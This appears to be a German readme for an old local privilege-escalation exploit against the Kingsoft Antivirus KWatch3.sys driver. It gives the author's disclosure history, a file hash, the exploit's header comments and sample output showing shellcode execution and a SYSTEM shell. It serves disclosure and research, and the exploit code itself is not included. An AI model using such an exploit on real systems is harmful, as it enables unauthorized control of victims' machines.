
Ein jahrealter Exploit einer lokalen EoP-Sicherheitslücke im Kingsoft Antivirus KWatch Driver Version 2009.3.17.77.
Ein Jahre alter Exploit einer lokalen EoP-Sicherheitslücke im Kingsoft Antivirus KWatch-Treiber Version 2009.3.17.77.
Ich meldete das Problem im Januar 2014 und wurde 8+ Jahre später über die CVE benachrichtigt. Ich entschied mich, dies hochzuladen, weil es amüsant genug ist, meinen alten Code zu finden und dass es so lange gedauert hat.
Daher muss dies trotz der neuen CVE keine neue Schwachstelle sein – eine schnelle Suche ergab bereits mehrere Berichte über die gleich aussehende Schwachstelle.
Ich danke IPA trotzdem dafür, dass sie ihren Teil beigetragen und meinen Tag versüßt haben.
Die anfällige Datei scheint ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479 zu sein
//
// Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys)
// Target File Version: 2009.3.17.77
// Affected Product: Kingsoft Internet Security 9 Plus
//
/*
------------------------------------------------------------------------------
Shellcode is located at 7E7E7E7E.
The device was opened as 00000020.
Shellcode was executed.
The SYSTEM shell was launched.
This process will be suspended for ever.
------------------------------------------------------------------------------
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>whoami
nt authority\system
------------------------------------------------------------------------------
*/